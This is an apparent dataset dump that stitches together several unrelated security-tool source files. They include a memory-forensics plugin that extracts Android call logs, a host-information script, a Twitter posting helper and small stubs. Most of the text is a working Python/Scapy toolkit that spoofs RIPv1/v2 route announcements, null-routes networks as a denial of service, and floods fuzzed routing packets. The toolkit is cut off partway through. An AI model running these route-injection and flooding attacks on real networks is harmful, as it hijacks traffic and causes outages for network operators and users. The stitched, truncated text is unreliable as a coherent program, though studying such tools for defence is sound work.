from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nmaper', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='nmapscan',
name='email_text',
field=models.CharField(default='websecweb@gmail.com', max_length=64),
preserve_default=False,
),
]
| 22.181818 | 81 | 0.59725 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Christian Hilgers, Holger Macht, Tilo Müller, Michael Spreitzenbarth
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
import volatility.plugins.linux.dalvik as dalvik
import volatility.plugins.linux.dalvik_loaded_classes as dalvik_loaded_classes
import volatility.plugins.linux.dalvik_find_class_instance as dalvik_find_class_instance
import time
###################################################################################################
class dalvik_app_calllog(linux_common.AbstractLinuxCommand):
###################################################################################################
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
dalvik.register_option_PID(self._config)
dalvik.register_option_GDVM_OFFSET(self._config)
self._config.add_option('CLASS_OFFSET', short_option = 'c', default = None,
help = 'This is the offset (in hex) of system class PhoneCallDetails.java', action = 'store', type = 'str')
###################################################################################################
def calculate(self):
# if no gDvm object offset was specified, use this one
if not self._config.GDVM_OFFSET:
self._config.GDVM_OFFSET = str(hex(0x41b0))
# use linux_pslist plugin to find process address space and ID if not specified
proc_as = None
tasks = linux_pslist.linux_pslist(self._config).calculate()
for task in tasks:
if str(task.comm) == "ndroid.contacts":
proc_as = task.get_process_address_space()
if not self._config.PID:
self._config.PID = str(task.pid)
break
# use dalvik_loaded_classes plugin to find class offset if not specified
if not self._config.CLASS_OFFSET:
classes = dalvik_loaded_classes.dalvik_loaded_classes(self._config).calculate()
for task, clazz in classes:
if (dalvik.getString(clazz.sourceFile)+"" == "PhoneCallDetails.java"):
self._config.CLASS_OFFSET = str(hex(clazz.obj_offset))
break
# use dalvik_find_class_instance plugin to find a list of possible class instances
instances = dalvik_find_class_instance.dalvik_find_class_instance(self._config).calculate()
for sysClass, inst in instances:
callDetailsObj = obj.Object('PhoneCallDetails', offset = inst, vm = proc_as)
# access type ID field for sanity check
typeID = int(callDetailsObj.callTypes.contents0)
# valid type ID must be 1,2 or 3
if (typeID == 1 or typeID == 2 or typeID == 3):
yield callDetailsObj
###################################################################################################
def render_text(self, outfd, data):
self.table_header(outfd, [ ("InstanceClass", "13"),
("Date", "19"),
("Contact", "20"),
("Number", "15"),
("Duration", "13"),
("Iso", "3"),
("Geocode", "15"),
("Type", "8")
])
for callDetailsObj in data:
# convert epoch time to human readable date and time
rawDate = callDetailsObj.date / 1000
date = str(time.gmtime(rawDate).tm_mday) + "." + \
str(time.gmtime(rawDate).tm_mon) + "." + \
str(time.gmtime(rawDate).tm_year) + " " + \
str(time.gmtime(rawDate).tm_hour) + ":" + \
str(time.gmtime(rawDate).tm_min) + ":" + \
str(time.gmtime(rawDate).tm_sec)
# convert duration from seconds to hh:mm:ss format
duration = str(callDetailsObj.duration / 3600) + "h " + \
str((callDetailsObj.duration % 3600) / 60) + "min " + \
str(callDetailsObj.duration % 60) + "s"
# replace call type ID by string
callType = int(callDetailsObj.callTypes.contents0)
if callType == 1:
callType = "incoming"
elif callType == 2:
callType = "outgoing"
elif callType == 3:
callType = "missed"
else:
callType = "unknown"
self.table_row( outfd,
hex(callDetailsObj.obj_offset),
date,
dalvik.parseJavaLangString(callDetailsObj.name.dereference_as('StringObject')),
dalvik.parseJavaLangString(callDetailsObj.formattedNumber.dereference_as('StringObject')),
duration,
dalvik.parseJavaLangString(callDetailsObj.countryIso.dereference_as('StringObject')),
dalvik.parseJavaLangString(callDetailsObj.geoCode.dereference_as('StringObject')),
callType)
| 51.941667 | 125 | 0.508974 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfoz):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.888889 | 85 | 0.766816 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2, 2015
Purpose: To grab your current Public IP (Eth & WLAN), Private IP, MAC Addresses, FQDN, and Hostname
Name: hostDetails.py
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import os
import socket
import subprocess
import shutil
import errno
if os.name != "nt":
import fcntl
import urllib2
import struct
import uuid
def get_ip(inter):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip_addr = socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', inter[:15]))[20:24])
return ip_addr
def get_mac_address(inter):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', inter[:15]))
mac_address = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
return mac_address
def get_localhost_details(interfaces_eth, interfaces_wlan):
hostdata = "None"
hostname = "None"
windows_ip = "None"
eth_ip = "None"
wlan_ip = "None"
host_fqdn = "None"
eth_mac = "None"
wlan_mac = "None"
windows_mac = "None"
hostname = socket.gethostbyname(socket.gethostname())
if hostname.startswith("127.") and os.name != "nt":
hostdata = socket.gethostbyaddr(socket.gethostname())
hostname = str(hostdata[1]).strip('[]')
host_fqdn = socket.getfqdn()
for interface in interfaces_eth:
try:
eth_ip = get_ip(interface)
if not "None" in eth_ip:
eth_mac = get_mac_address(interface)
break
except IOError:
pass
for interface in interfaces_wlan:
try:
wlan_ip = get_ip(interface)
if not "None" in wlan_ip:
wlan_mac = get_mac_address(interface)
break
except IOError:
pass
else:
windows_ip = socket.gethostbyname(socket.gethostname())
windows_mac = uuid.getnode()
windows_mac = ':'.join(("%012X" % windows_mac)[i:i+2] for i in range(0, 12, 2))
hostdata = socket.gethostbyaddr(socket.gethostname())
hostname = str(socket.gethostname())
host_fqdn = socket.getfqdn()
return hostdata, hostname, windows_ip, eth_ip, wlan_ip, host_fqdn, eth_mac, wlan_mac, windows_mac
def get_public_ip(request_target):
grabber = urllib2.build_opener()
grabber.addheaders = [('User-agent','Mozilla/5.0')]
try:
public_ip_address = grabber.open(target_url).read()
except urllib2.HTTPError, error:
print("There was an error trying to get your Public IP: %s") % (error)
except urllib2.URLError, error:
print("There was an error trying to get your Public IP: %s") % (error)
return public_ip_address
wireless_ip = "None"
windows_ip = "None"
ethernet_ip = "None"
public_ip = "None"
host_fqdn = "None"
hostname = "None"
fqdn = "None"
ethernet_mac = "None"
wireless_mac = "None"
windows_mac = "None"
target_url = "http://ip.42.pl/raw"
inter_eth = ["eth0", "eth1", "eth2", "eth3"]
inter_wlan = ["wlan0", "wlan1", "wlan2", "wlan3", "wifi0", "wifi1", "wifi2", "wifi3", "ath0", "ath1", "ath2", "ath3"]
public_ip = get_public_ip(target_url)
hostdata, hostname, windows_ip, ethernet_ip, wireless_ip, host_fqdn, ethernet_mac, wireless_mac, windows_mac = get_localhost_details(inter_eth, inter_wlan)
if not "None" in public_ip:
print("Your Public IP address is: %s") % (str(public_ip))
else:
print("Your Public IP address was not found")
if not "None" in ethernet_ip:
print("Your Ethernet IP address is: %s") % (str(ethernet_ip))
print("Your Ethernet MAC address is: %s") % (str(ethernet_mac))
elif os.name != "nt":
print("No active Ethernet Device was found")
if not "None" in wireless_ip:
print("Your Wireless IP address is: %s") % (str(wireless_ip))
print("Your Wireless Devices MAC Address is: %s") % (str(wireless_mac))
elif os.name != "nt":
print("No active Wireless Device was found")
if not "None" in windows_ip:
print("Your Windows Host IP address is: %s") % (str(windows_ip))
print("Your Windows Mac address is: %s") % (str(windows_mac))
else:
print("You are not running Windows")
if not "None" in hostname:
print("Your System's hostname is: %s") % (hostname)
if host_fqdn == 'localhost':
print("Your System is not Registered to a Domain")
else:
print("Your System's Fully Qualifed Domain Name is: %s") % (host_fqdn)
| 37.5 | 155 | 0.672233 |
SNAP_R | # THIS PROGRAM IS TO BE USED FOR EDUCATIONAL PURPOSES ONLY.
# CAN BE USED FOR INTERNAL PEN-TESTING, STAFF RECRUITMENT, SOCIAL ENGAGEMENT
import credentials
import argparse
import tweepy
# Posts a new status
def post_status(text):
auth = tweepy.OAuthHandler(credentials.consumer_key,
credentials.consumer_secret)
auth.set_access_token(credentials.access_token,
credentials.access_token_secret)
api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())
api.update_status(text)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Posts status to timeline"
" of user given"
" in credentials.py")
parser.add_argument("text", help="text to post")
args = parser.parse_args()
post_status(args.text)
| 36.666667 | 76 | 0.612403 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
cybersecurity-penetration-testing | # Makes the wordPatterns.py File
# http://inventwithpython.com/hacking (BSD Licensed)
# Creates wordPatterns.py based on the words in our dictionary
# text file, dictionary.txt. (Download this file from
# http://invpy.com/dictionary.txt)
import pprint
def getWordPattern(word):
# Returns a string of the pattern form of the given word.
# e.g. '0.1.2.3.4.1.2.3.5.6' for 'DUSTBUSTER'
word = word.upper()
nextNum = 0
letterNums = {}
wordPattern = []
for letter in word:
if letter not in letterNums:
letterNums[letter] = str(nextNum)
nextNum += 1
wordPattern.append(letterNums[letter])
return '.'.join(wordPattern)
def main():
allPatterns = {}
fo = open('dictionary.txt')
wordList = fo.read().split('\n')
fo.close()
for word in wordList:
# Get the pattern for each string in wordList.
pattern = getWordPattern(word)
if pattern not in allPatterns:
allPatterns[pattern] = [word]
else:
allPatterns[pattern].append(word)
# This is code that writes code. The wordPatterns.py file contains
# one very, very large assignment statement.
fo = open('wordPatterns.py', 'w')
fo.write('allPatterns = ')
fo.write(pprint.pformat(allPatterns))
fo.close()
if __name__ == '__main__':
main() | 26.096154 | 71 | 0.606534 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer, covering RIPAuth and RIPEntry structures fuzzing
#
# Python requirements:
# - scapy
#
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
#
import sys
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'debug' : False,
'delay' : 1.0,
'interface': None,
'processors' : 8,
'network': '',
'spoof': '',
'nexthop': '',
'netmask': '',
'metric': 0,
'auth-type': '',
'auth-data': '',
}
attacks = {}
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
for p in packets:
if stopThreads: break
try:
if stopThreads:
raise KeyboardInterrupt
sendp(p, verbose = False)
if len(p) < 1500:
Logger.dbg("Sent: \n" + str(p))
except KeyboardInterrupt:
break
except Exception as e:
pass
Logger.dbg('Stopping task: {}'.format(num))
class Logger:
@staticmethod
def _out(x):
if config['verbose'] or config['debug']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[.] ' + x)
@staticmethod
def dbg(x):
if config['debug']:
Logger._out('[dbg] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# Well, not very fuzzy that fuzzer I know.
class Fuzzer:
@staticmethod
def get8bitFuzzes():
out = set()
for i in range(9):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**8]
@staticmethod
def get16bitFuzzes():
out = set()
for i in range(17):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**16]
@staticmethod
def get32bitFuzzes():
out = set()
for i in range(33):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**32]
@staticmethod
def deBrujinPattern(length):
if length == 0: return ''
if length >= 20280:
out = ''
out += Fuzzer.deBrujinPattern(20280 - 1)
out += "A" * (length - 20280 - 1)
return out
pattern = ''
for upper in string.ascii_uppercase:
for lower in string.ascii_lowercase:
for digit in string.digits:
if len(pattern) < length:
pattern += upper + lower + digit
else:
out = pattern[:length]
return out
return pattern
@staticmethod
def getFuzzyStrings(maxLen = -1, allOfThem = True):
out = set()
for b in Fuzzer.get16bitFuzzes():
out.add(Fuzzer.deBrujinPattern(b))
if allOfThem:
for b in range(0, 65400, 256):
if maxLen != -1 and b > maxLen: break
out.add(Fuzzer.deBrujinPattern(b))
if maxLen != -1:
return set([x for x in out if len(x) <= maxLen])
return out
@staticmethod
def get32bitProblematicPowersOf2():
return Fuzzer.get32bitFuzzes()
class RoutingAttack:
def __init__(self):
pass
def injectOptions(self, params, config):
pass
def launch(self):
pass
class Sniffer(RoutingAttack):
def __init__(self):
pass
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
def processPacket(pkt):
# TODO
raise Exception('Not yet implemented.')
def launch(self):
# TODO
raise Exception('Not yet implemented.')
def packetCallback(d):
self.processPacket(d)
try:
pkts = sniff(
count = 1000,
filter = 'udp port 520',
timeout = 10.0,
prn = packetCallback,
iface = self.config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
pass
else:
Logger.err('Exception occured during sniffing: {}'.format(str(e)))
except KeyboardInterrupt:
pass
class RIPv1v2Attacks(RoutingAttack):
ripAuthTypes = {
'simple' : 2, 'md5' : 3, 'md5authdata': 1
}
def __init__(self):
self.config = {
'interface' : '',
'delay': 1,
'network' : '',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
'version' : 0,
}
@staticmethod
def getRipAuth(config):
ripauth = RIPAuth()
ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
if ripauth.authtype == 2:
ripauth.password = config['auth-data']
elif ripauth.authtype == 1:
ripauth.authdata = config['auth-data']
elif ripauth.authtype == 3:
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = len(config['auth-data'])
ripauth.seqnum = 0
return ripauth
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
Logger.info("Fake Route Announcement to be injected:")
Logger.info("\tNetwork: {}".format(config['network']))
Logger.info("\tNetmask: {}".format(config['netmask']))
Logger.info("\tNexthop: {}".format(config['nexthop']))
Logger.info("\tMetric: {}".format(config['metric']))
if not config['network'] or not config['netmask'] \
or not config['nexthop'] or not config['metric']:
Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
return False
if params['version'] != 1 and params['version'] != 2:
Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
return False
return True
def launch(self):
packet = self.getPacket()
Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
def getPacket(self):
networkToAnnounce = self.config['network']
metricToAnnounce = self.config['metric']
netmaskToAnnounce = self.config['netmask']
nexthopToAnnounce = self.config['nexthop']
spoofedIp = self.config['spoof']
etherframe = Ether() # Start definition of Ethernet Frame
ip = IP() # IPv4 packet
udp = UDP()
udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
udp.dport = 520
rip = RIP()
ripentry = RIPEntry() # Announced route
ripentry.AF = "IP" # Address Family: IP
if 'AF' in self.config.keys():
ripentry.AF = self.config['AF']
ripentry.addr = networkToAnnounce # Spoof route for this network...
ripentry.metric = metricToAnnounce
if self.config['version'] == 1:
ip.dst = '255.255.255.255' # RIPv1 broadcast destination
etherframe.dst = 'ff:ff:ff:ff:ff:ff'
rip.version = 1 # RIPv1
rip.cmd = 2 # Command: Response
elif self.config['version'] == 2:
ip.dst = '224.0.0.9' # RIPv2 multicast destination
rip.version = 2 # RIPv2
rip.cmd = 2 # Command: Response
ripentry.RouteTag = 0
ripentry.mask = netmaskToAnnounce
ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
if 'rip_cmd' in self.config.keys():
rip.cmd = self.config['rip_cmd']
if not self.config['auth-type']:
rip_packet = etherframe / ip / udp / rip / ripentry
else:
ripauth = RIPv1v2Attacks.getRipAuth(self.config)
Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
self.config['auth-type'], self.config['auth-data']
))
rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
rip_packet[IP].src = spoofedIp
return rip_packet
class RIPFuzzer(RoutingAttack):
ripCommands = (
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
)
def __init__(self):
self.config = {
'interface' : '',
'network' : '192.168.1.0',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
}
def injectOptions(self, params, config):
self.config = config
self.params = params
return True
def launch(self):
packets = set()
Logger.info("Generating fuzzed packets for RIPv1...")
packets.update(self.generateRipv1Packets())
Logger.info("Generating fuzzed packets for RIPv2...")
packets.update(self.generateRipv2Packets())
Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
packetsLists = [[] for x in range(self.config['processors'])]
packetsList = list(packets)
for i in range(len(packetsList)):
packetsLists[i % config['processors']].append(packetsList[i])
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding. Press CTRL-C to stop that.')
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
def generateRipv1Packets(self):
packets = set()
base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 3: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 4: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 5: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 1, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
def generateRipv2Packets(self):
packets = set()
base = Ether() / IP(src = self.config['spoof'], dst = '224.0.0.9') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 2, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Version values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 3: Fuzz on Authentication data values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = val, cmd = 1)
for auth in RIPFuzzer.fuzzRipv2Auth():
packets.add(base / rip / auth )
packets.add(base / rip / auth / RIPEntry() )
# Step 4: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 5: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 6: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 2, cmd = 2)
packets.add(base / rip / RIPEntry(metric = val) )
# Step 7: Add multiple RIPEntry structures
for num in Fuzzer.get32bitProblematicPowersOf2():
rip = RIP(version = 2, cmd = 2)
entries = []
try:
ipv4 = socket.inet_ntoa(struct.pack('!L', num))
except:
ipv4 = '127.0.0.2'
if (num * 20) > 2 ** 16:
break
for i in range(num):
entries.append(RIPEntry(addr = ipv4))
packets.add(base / rip / ''.join([str(x) for x in entries]))
return packets
@staticmethod
def fuzzRipv2Auth():
auths = set()
# Step 1: Fuzz on RIPAuth authtype.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = val
ripauth.password = '0123456789abcdef'
auths.add(ripauth)
# Step 2: Fuzz on RIPAuth md5authdata structure's digestoffset.
for val in set(Fuzzer.get16bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = val
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 3: Fuzz on RIPAuth md5authdata structure's keyid.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = val
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = 0
auths.add(ripauth)
# Step 4: Fuzz on RIPAuth md5authdata structure's seqnum.
for val in set(Fuzzer.get8bitFuzzes()):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = '\x01\x02\x03\x04\x05\x06\x07\x08'
ripauth.seqnum = val
auths.add(ripauth)
# Step 5: Fuzz on RIPAuth md5authdata structure's authdatalen.
for val in set(Fuzzer.getFuzzyStrings(maxLen = 16, allOfThem = False)):
ripauth = RIPAuth()
ripauth.authtype = 1
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = val
ripauth.seqnum = 0
auths.add(ripauth)
return auths
def getHwAddr(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', ifname[:15]))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
def getIfaceIP(iface):
out = shell("ip addr show " + iface + " | grep 'inet ' | awk '{print $2}' | head -1 | cut -d/ -f1")
Logger.dbg('Interface: {} has IP: {}'.format(iface, out))
return out
def shell(cmd):
out = commands.getstatusoutput(cmd)[1]
Logger.dbg('shell("{}") returned:\n"{}"'.format(cmd, out))
return out
def selectDefaultInterface():
global config
commands = {
'ip' : "ip route show | grep default | awk '{print $5}' | head -1",
'ifconfig': "route -n | grep 0.0.0.0 | grep 'UG' | awk '{print $8}' | head -1",
}
for k, v in commands.items():
out = shell(v)
if len(out) > 0:
Logger.dbg('Default interface lookup command returned:\n{}'.format(out))
config['interface'] = out
return out
return ''
def parseOptions(argv):
global config
print('''
:: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v{}
'''.format(VERSION))
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
parser.add_argument('-v', '--verbose', action='store_true', help='Display verbose output.')
parser.add_argument('-D', '--debug', action='store_true', help='Display debug output.')
parser.add_argument('-d', '--delay', type=float, default=1.0, help='Delay in seconds (float) between sending consecutive packets. Default: 1 second. Not applies to fuzzers.')
parser.add_argument('-t', '--attack', metavar='ATTACK', default='', help='Select attack to launch. One can use: "-t list" to list available attacks.')
parser.add_argument('-i', '--interface', metavar='DEV', default='', help='Select interface on which to operate.')
parser.add_argument('-s', '--spoof', help = 'IP address to be used as a spoofed/fake gateway, e.g. Attacker machine address. By default will try to figure out that address automatically.', default='')
auth = parser.add_argument_group('Routing Protocol Authentication', 'Specifies authentication data for Routing protocol to use')
auth.add_argument('--auth-type', help = 'Authentication type. Can be one of following: "simple", "md5authdata", "md5". Applies only to authentication-capable protocols, like RIPv2', default='')
auth.add_argument('--auth-data', help = 'Password / authentication data to pass in every packet. This field depends on the "--auth-type" used.', default='')
route = parser.add_argument_group('Spoofed Route injection', 'Specifies fake route details to inject')
route.add_argument('-a', '--network', help = 'IP address of network to announce, can be paired with netmask in CIDR notation. One can use "default" for 0.0.0.0')
route.add_argument('-b', '--netmask', help = 'Netmask to use (can be inferred from "--network". Default: /24', default='255.255.255.0')
route.add_argument('-c', '--nexthop', help = 'Spoofed next hop address. Default: 0.0.0.0.', default = '0.0.0.0')
route.add_argument('-m', '--metric', help = 'Metric to be used. The lower the greater priority it gets. Default: 10', type=int, default='10')
args = parser.parse_args()
if not 'attack' in args:
Logger.err('You must specify an attack to launch!')
return False
if args.attack == 'list':
print("Available attacks:")
for a in attacks:
print("\t{}. '{}' - {}".format(a['num'], a['name'], a['desc']))
sys.exit(0)
else:
att = args.attack
try:
att = int(att)
except: pass
for a in attacks:
if att == a['num'] or att == a['name']:
config['attack'] = a
break
if 'attack' not in config or not config['attack']:
Logger.err("Selected attack is not implemented or wrongly stated.")
parser.print_help()
return False
config['verbose'] = args.verbose
config['debug'] = args.debug
config['delay'] = args.delay
if args.interface != '': config['interface'] = args.interface
else: config['interface'] = selectDefaultInterface()
if args.network != '': config['network'] = args.network
if args.spoof != '': config['spoof'] = args.spoof
else: config['spoof'] = getIfaceIP(config['interface'])
Logger.info("Using {} as local/spoof IP address".format(config['spoof']))
if args.netmask != '': config['netmask'] = args.netmask
if args.nexthop != '': config['nexthop'] = args.nexthop
if args.metric != '': config['metric'] = args.metric
if args.auth_type != '': config['auth-type'] = args.auth_type
if args.auth_data != '': config['auth-data'] = args.auth_data
if config['auth-type'] != '':
if config['auth-data'] == '':
Logger.err("You must specify authentication data along with the --auth-type.")
return False
config['auth-type'] = args.auth_type
config['auth-data'] = args.auth_data
return args
def main(argv):
global attacks
attacks = (
{
'num': 0,
'name': 'sniffer',
'desc': '(NOT YET IMPLEMENTED) Sniffer hunting for authentication strings.',
'object': Sniffer,
'params': {
}
},
{
'num': 1,
'name': 'ripv1-route',
'desc': 'RIP Spoofed Route announcement',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
}
},
{
'num': 2,
'name': 'ripv1-dos',
'desc': 'RIPv1 Denial of Service by Null-routing',
'object': RIPv1v2Attacks,
'params': {
'version' : 1,
'delay' : 1,
'network': '0.0.0.0',
'metric': 1
}
